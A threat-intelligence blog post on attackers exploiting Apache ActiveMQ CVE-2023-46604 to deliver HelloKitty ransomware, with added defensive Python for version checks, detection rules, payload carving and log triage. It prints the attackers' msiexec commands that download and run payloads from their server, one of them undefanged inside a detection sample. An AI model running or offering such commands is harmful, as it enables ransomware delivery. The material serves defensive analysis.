Last updated at Fri, 03 Nov 2023 18:32:32 GMT

Tom Elkins, John Fenninger, Evan McCann, Matthew Smith, and Micah Young contributed insight into attacker behavior for this blog.

Beginning Friday, October 27, Rapid7 Managed Detection and Response (MDR) identified suspected exploitation of Apache ActiveMQ CVE-2023-46604 in two different customer environments. In both instances, the adversary attempted to deploy ransomware binaries on target systems in an effort to ransom the victim organizations. Based on the ransom note and available evidence, we attributed the activity to the HelloKitty ransomware family, whose source code was leaked on a forum in early October. Rapid7 observed similar indicators of compromise across the affected customer environments, both of which were running outdated versions of Apache ActiveMQ.

CVE-2023-46604 is a remote code execution vulnerability in Apache ActiveMQ that allows a remote attacker with network access to a broker to "run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath." That is one of the more convoluted vulnerability descriptions we have seen, but the root cause of the issue is insecure deserialization: the broker instantiates a class named in an OpenWire message without validating it, so anything reachable on the classpath becomes a gadget. No authentication is needed beyond being able to reach the OpenWire transport port.

Apache disclosed the vulnerability and released new versions of ActiveMQ on October 25, 2023. Proof-of-concept exploit code and vulnerability details are both publicly available. Rapid7's vulnerability research team has tested the public PoC and confirmed that the behavior MDR observed in customer environments is consistent with what we would expect from exploitation of CVE-2023-46604. Rapid7 research has a technical analysis of the vulnerability in AttackerKB.

Affected Products

According to Apache’s advisory, CVE-2023-46604 affects the following:

  • Apache ActiveMQ 5.18.0 before 5.18.3
  • Apache ActiveMQ 5.17.0 before 5.17.6
  • Apache ActiveMQ 5.16.0 before 5.16.7
  • Apache ActiveMQ before 5.15.16
  • Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
  • Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
  • Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
  • Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16
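As an added example (not part of the Apache advisory or of Rapid7's tooling), the following Python encodes the affected ranges above as a check that can be run over a version inventory. It assumes version strings of the form x.y.z, optionally embedded in an install path such as the apache-activemq-5.15.3 directory seen later in this post, and treats any branch newer than 5.18 as not listed by the advisory. It checks the version string only; it says nothing about whether the OpenWire port is actually reachable.

```python
import re

# Fixed versions per branch, transcribed from the advisory ranges above.
# "X.Y.0 before X.Y.Z" means every X.Y.n with n < Z is affected.
FIXED_BY_BRANCH = {
    (5, 18): (5, 18, 3),
    (5, 17): (5, 17, 6),
    (5, 16): (5, 16, 7),
}
# "Apache ActiveMQ before 5.15.16" covers 5.15.x and every older release
# (including the 5.8.0 and later range listed for the Legacy OpenWire Module).
OLDEST_FIXED = (5, 15, 16)

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Extract an x.y.z version tuple from a bare version or an install path."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no x.y.z version found in {text!r}")
    return tuple(int(part) for part in m.groups())


def is_vulnerable(text):
    """True if the ActiveMQ version found in `text` falls inside an affected range."""
    v = parse_version(text)
    branch = v[:2]
    if branch in FIXED_BY_BRANCH:
        return v < FIXED_BY_BRANCH[branch]
    if branch > (5, 18):
        # Assumption: branches newer than 5.18 are not listed by the advisory.
        return False
    return v < OLDEST_FIXED


def triage(inventory):
    """Map host -> version/path strings to (host, version, vulnerable) rows."""
    rows = []
    for host, text in sorted(inventory.items()):
        v = parse_version(text)
        rows.append((host, ".".join(map(str, v)), is_vulnerable(text)))
    return rows


# Constructed inventory for illustration; only the 5.15.3 path mirrors this post.
SAMPLE_INVENTORY = {
    "mq-01": r"D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64",
    "mq-02": "5.18.2",
    "mq-03": "5.18.3",
    "mq-04": "5.16.7",
    "mq-05": "5.8.0",
}

if __name__ == "__main__":
    for host, version, vuln in triage(SAMPLE_INVENTORY):
        print(f"{host}: {version} -> {'VULNERABLE' if vuln else 'fixed'}")
```

Feed it whatever your asset inventory already holds (package versions, install paths, JAR names); the regex picks the first x.y.z it sees, so keep inputs to one version per string.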

Observed Attacker Behavior

In successful exploitation of the vulnerability, the parent process of the attacker's commands is the java.exe instance running the targeted ActiveMQ broker; in both incidents this was the installation at D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64. Post-exploitation, the adversary attempted to load remote binaries named M2.png and M4.png using MSIExec. The threat actor's attempts to deploy ransomware were somewhat clumsy: in one of the incidents Rapid7 observed, there were more than half a dozen unsuccessful attempts to encrypt assets.
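The process chain described above (the broker's java.exe spawning cmd.exe, which runs msiexec against an HTTP URL) is the kind of thing process-creation telemetry catches well. As an added example that is not Rapid7's detection content, the following Python runs two such rules over constructed Sysmon-style process events. It assumes the broker JVM can be recognised by "activemq" appearing in its image path or command line (for instance -Dactivemq.home or the install directory), and the first sample event is built from the parent path and the msiexec command line given in this post.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (Sysmon event ID 1 / EDR style fields)."""
    parent_image: str
    parent_cmdline: str
    image: str
    cmdline: str


SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# msiexec invoked with /i (install) and a package URL instead of a local path.
MSIEXEC_HTTP = re.compile(r"\bmsiexec(?:\.exe)?\b.*?/i\s+\"?https?://", re.IGNORECASE)


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_activemq_broker(image, cmdline):
    """Assumption: the broker JVM is identifiable by 'activemq' in its image path
    or command line (e.g. the install directory or -Dactivemq.home)."""
    return basename(image) == "java.exe" and "activemq" in f"{image} {cmdline}".lower()


def detect(ev):
    """Return the list of rule names that fire for one event."""
    hits = []
    if is_activemq_broker(ev.parent_image, ev.parent_cmdline) and basename(ev.image) in SHELLS:
        hits.append("activemq_java_spawned_shell")
    if MSIEXEC_HTTP.search(ev.cmdline):
        hits.append("msiexec_install_from_http")
    return hits


def run_detection(events):
    """Return (index, hits) for every event that matched at least one rule."""
    results = []
    for i, ev in enumerate(events):
        hits = detect(ev)
        if hits:
            results.append((i, hits))
    return results


BROKER = r"D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64"

# Constructed events. The first mirrors the chain described in this post (parent
# path and msiexec command line from the IOC section); the rest are for contrast.
SAMPLE_EVENTS = [
    ProcessEvent(
        parent_image=r"C:\Program Files\Java\jre1.8.0_202\bin\java.exe",
        parent_cmdline=f'java.exe -Dactivemq.home="{BROKER}" org.apache.activemq.console.Main start',
        image=r"C:\Windows\System32\cmd.exe",
        cmdline='cmd.exe /c "start msiexec /q /i http://172.245.16.125/m4.png"',
    ),
    ProcessEvent(  # ordinary interactive shell: no match
        parent_image=r"C:\Windows\explorer.exe", parent_cmdline="explorer.exe",
        image=r"C:\Windows\System32\cmd.exe", cmdline="cmd.exe",
    ),
    ProcessEvent(  # local MSI install from a shell: no match
        parent_image=r"C:\Windows\System32\cmd.exe", parent_cmdline="cmd.exe",
        image=r"C:\Windows\System32\msiexec.exe", cmdline=r"msiexec /q /i C:\Temp\agent.msi",
    ),
    ProcessEvent(  # the broker spawning a shell for any reason is worth a look
        parent_image=r"C:\Program Files\Java\jre1.8.0_202\bin\java.exe",
        parent_cmdline=f'java.exe -Dactivemq.home="{BROKER}"',
        image=r"C:\Windows\System32\cmd.exe", cmdline="cmd.exe /c whoami",
    ),
]

if __name__ == "__main__":
    for idx, hits in run_detection(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx].cmdline, "->", hits)
```

The msiexec process itself shows up as a separate event with cmd.exe as its parent and is caught by the second rule on its own, so the two rules do not depend on seeing the whole chain. A broker JVM spawning a shell is rare enough in practice that the first rule can be tuned to zero expected noise on a dedicated ActiveMQ host.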

HelloKitty Ransomware Details

Rapid7 acquired the files M4.png and M2.png from 172.245.16[.]125 and analyzed them in a controlled environment. Despite the .png extension, both are MSI packages, and both contain a 32-bit .NET executable internally named dllloader. Within dllloader, Rapid7 found that the executable loads a base64-encoded payload. We decoded the payload and determined it to be a 32-bit .NET DLL named EncDLL.

The EncDLL binary contains ransomware-like functionality: the DLL searches for specific processes and stops them from running. Rapid7 observed that the DLL uses the .NET RSACryptoServiceProvider class in its file encryption routine, appending the extension .locked to encrypted files. We also observed a function that specifies which directories to exclude from encryption, a static variable holding the ransom note, and a function that attempts to communicate with an HTTP server at 172.245.16[.]125.
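A loader that carries its second stage as a base64 string, as dllloader carries EncDLL, can be triaged without running it: scan the file for long base64 runs, decode each, and keep the ones that parse as a PE image, checking the CLR data directory to tell .NET from native. The following Python is an added example, not Rapid7's analysis tooling; the sample loader body and the minimal PE32 header it embeds are constructed here and are not bytes from the real samples.

```python
import base64
import binascii
import re
import struct

# Runs of base64 text long enough to plausibly hold a PE image.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def try_b64decode(run):
    """Decode a base64 run, trimming a partial trailing quantum in case the run
    absorbed neighbouring characters that happen to be base64-safe."""
    for candidate in (run, run[: len(run) // 4 * 4]):
        try:
            return base64.b64decode(candidate, validate=True)
        except binascii.Error:
            continue
    return None


def pe_info(data):
    """Return (is_dll, is_dotnet) if `data` starts with a PE image, else None."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    try:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew : e_lfanew + 4] != b"PE\0\0":
            return None
        coff = e_lfanew + 4
        characteristics = struct.unpack_from("<H", data, coff + 18)[0]
        is_dll = bool(characteristics & 0x2000)            # IMAGE_FILE_DLL
        opt = coff + 20
        magic = struct.unpack_from("<H", data, opt)[0]
        # PE32 has 96 bytes of optional header before the data directories, PE32+ 112.
        dirs_off, count_off = (opt + 96, opt + 92) if magic == 0x10B else (opt + 112, opt + 108)
        n_dirs = struct.unpack_from("<I", data, count_off)[0]
        is_dotnet = False
        if n_dirs >= 15:                                   # entry 14 is the CLR runtime header
            clr_rva, clr_size = struct.unpack_from("<II", data, dirs_off + 14 * 8)
            is_dotnet = clr_rva != 0 and clr_size != 0
    except struct.error:
        return None                                        # truncated header
    return is_dll, is_dotnet


def carve_embedded_pe(blob):
    """Find base64-encoded PE images inside a loader's bytes."""
    found = []
    for m in B64_RUN.finditer(blob):
        decoded = try_b64decode(m.group(0))
        if decoded is None:
            continue
        info = pe_info(decoded)
        if info:
            found.append({"offset": m.start(), "size": len(decoded),
                          "is_dll": info[0], "is_dotnet": info[1], "data": decoded})
    return found


def build_fake_dotnet_dll():
    """Constructed sample: the smallest PE32 header layout that parses as a .NET DLL
    (no sections, not loadable), standing in for EncDLL."""
    img = bytearray(0x44 + 20 + 224)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                        # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HH", img, 0x44, 0x14C, 0)                    # i386, 0 sections
    struct.pack_into("<HH", img, 0x44 + 16, 224, 0x2102)            # opt hdr size, DLL|32BIT|EXECUTABLE
    opt = 0x44 + 20
    struct.pack_into("<H", img, opt, 0x10B)                         # PE32 magic
    struct.pack_into("<I", img, opt + 92, 16)                       # NumberOfRvaAndSizes
    struct.pack_into("<II", img, opt + 96 + 14 * 8, 0x2008, 0x48)   # CLR runtime header directory
    return bytes(img)


FAKE_DLL = build_fake_dotnet_dll()

# Constructed loader body: string-table noise, a base64 blob that is not a PE,
# then the base64-encoded DLL, roughly how dllloader carries EncDLL.
SAMPLE_LOADER = (
    b"\x00\x00dllloader\x00Stage2\x00"
    + base64.b64encode(b"A" * 80) + b"\x00"
    + b"payload=" + base64.b64encode(FAKE_DLL) + b"\x00"
    + b"\x00\x00RSACryptoServiceProvider\x00"
)

if __name__ == "__main__":
    for hit in carve_embedded_pe(SAMPLE_LOADER):
        print(f"PE at 0x{hit['offset']:x}: {hit['size']} bytes, dll={hit['is_dll']}, dotnet={hit['is_dotnet']}")
```

Run it over the extracted dllloader executable rather than the MSI container; the 64-character minimum and the PE check together keep false positives down to base64 blobs that really are images, and anything it carves can be hashed and compared against the EncDll hash listed in the IOC section.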

The ransom note directs the victim to communicate via the email address service@hellokittycat[.]online.

Indicators of Compromise

Rapid7's vulnerability research team analyzed CVE-2023-46604 and the available public exploit code. In our test setup, activemq.log contained a single-line entry for successful exploitation of CVE-2023-46604:

2023-10-31 05:04:58,736 | WARN  | Transport Connection to: tcp://192.168.86.35:15871 failed: java.net.SocketException: An established connection was aborted by the software in your host machine | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///192.168.86.35:15871@61616

In the above example, the attacker's (i.e., the researcher's) IP was 192.168.86.35, and the target TCP port was 61616, the default OpenWire transport port. Depending on logging settings, which are configurable, more or less information may be available. Note that this WARN entry is written for any client connection that drops unexpectedly, so on its own it is not conclusive evidence of exploitation; treat unexpected source IPs as a lead to correlate with process telemetry from the broker host.
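Pulling the fields out of that line and flagging connections from outside the broker's expected client population is a quick first pass over a large activemq.log. The following Python is an added example, not part of this post or of ActiveMQ; the sample log is constructed, with only the second line taken from the entry above, and the 10.20.0.0/24 client range is an assumption to be replaced with the real producer and consumer subnets.

```python
import ipaddress
import re

# Shape of the transport-failure WARN line shown above:
# <ts> | <level> | Transport Connection to: tcp://<client>:<port> failed: <exception>[: <msg>]
#      | <logger> | ActiveMQ Transport: tcp:///<client>:<port>@<broker port>
TRANSPORT_FAIL = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}[,.]\d{3})\s*\|\s*(?P<level>[A-Z]+)\s*\|\s*"
    r"Transport Connection to: tcp://(?P<client_ip>[^:\s]+):(?P<client_port>\d+) failed: "
    r"(?P<exception>[\w.$]+)(?::\s*(?P<message>[^|]*?))?\s*\|.*?"
    r"tcp:///[^@\s]+@(?P<broker_port>\d+)\s*$"
)


def parse_transport_failure(line):
    """Return a dict of fields for a transport-failure entry, or None for any other line."""
    m = TRANSPORT_FAIL.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d["client_port"] = int(d["client_port"])
    d["broker_port"] = int(d["broker_port"])
    d["message"] = (d["message"] or "").strip()
    return d


def triage(lines, known_clients):
    """Flag transport failures whose client IP is outside the expected client ranges."""
    nets = [ipaddress.ip_network(n) for n in known_clients]
    flagged = []
    for line in lines:
        entry = parse_transport_failure(line)
        if entry is None:
            continue
        ip = ipaddress.ip_address(entry["client_ip"])
        entry["known_client"] = any(ip in n for n in nets)
        if not entry["known_client"]:
            flagged.append(entry)
    return flagged


# Constructed sample log. The second line is the entry quoted in this post; the
# startup line and the failure from a known client are made up for contrast.
SAMPLE_LOG = [
    "2023-10-31 05:00:12,001 | INFO  | Apache ActiveMQ 5.15.3 (localhost, ID:mq-01-49154-1698728412001-0:1) started | org.apache.activemq.broker.BrokerService | main",
    "2023-10-31 05:04:58,736 | WARN  | Transport Connection to: tcp://192.168.86.35:15871 failed: java.net.SocketException: An established connection was aborted by the software in your host machine | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///192.168.86.35:15871@61616",
    "2023-10-31 05:10:03,118 | WARN  | Transport Connection to: tcp://10.20.0.15:50211 failed: java.io.EOFException | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///10.20.0.15:50211@61616",
]

# Assumption: the broker's legitimate producers and consumers live in 10.20.0.0/24.
KNOWN_CLIENTS = ["10.20.0.0/24"]

if __name__ == "__main__":
    for e in triage(SAMPLE_LOG, KNOWN_CLIENTS):
        print(f"{e['ts']} unknown client {e['client_ip']}:{e['client_port']} "
              f"-> broker port {e['broker_port']} ({e['exception']})")
```

Because the same WARN appears for benign disconnects, the allowlist is what makes this useful: a transport failure from an address that should never talk OpenWire is the lead, and the timestamp is what you line up against process creation on the broker.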

Other IOCs:

Files dropped and executed via the msiexec command:

  • cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m4.png"
  • cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m2.png"

The following file hashes (SHA-256) belong to the two MSI packages downloaded from 172.245.16[.]125 and the .NET binaries they carry:

  • M2.msi: 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4
  • M4.msi: 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0
  • dllloader: C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7
  • EncDll: 3e65437f910f1f4e93809b81c19942ef74aa250ae228caca0b278fc523ad47c5

Mitigation Guidance

Organizations should update to a fixed version of ActiveMQ as soon as possible and look for indicators of compromise in their environments. Apache-supplied updates are available here. Apache also provides information on improving the security of ActiveMQ implementations here. Since the vulnerability is reachable by anyone who can connect to the OpenWire transport, confirm that the broker's OpenWire port (61616 by default) is not exposed to untrusted networks while patching is in progress.

Rapid7 Customers

Rapid7 MDR, InsightIDR, and MTC (Managed Threat Complete) customers have the following rules deployed and alerting on post-exploitation activity related to this threat. Rapid7 recommends ensuring the Insight Agent is deployed to all applicable assets in customer environments:

  • Suspicious Process - Apache ActiveMQ Launching CMD Process
  • Attacker Technique - MSIExec loading object via HTTP
  • Suspicious Process - Volume Shadow Service Deleting Shadow Copies

InsightVM and Nexpose customers can assess their exposure to CVE-2023-46604 with an authenticated vulnerability check for Windows released on November 1.

Updates

November 2, 2023: Updated to reflect availability of InsightVM content and to correct IOC typos (a missing character in the EncDll hash, an incorrect character in one of the dropped file names).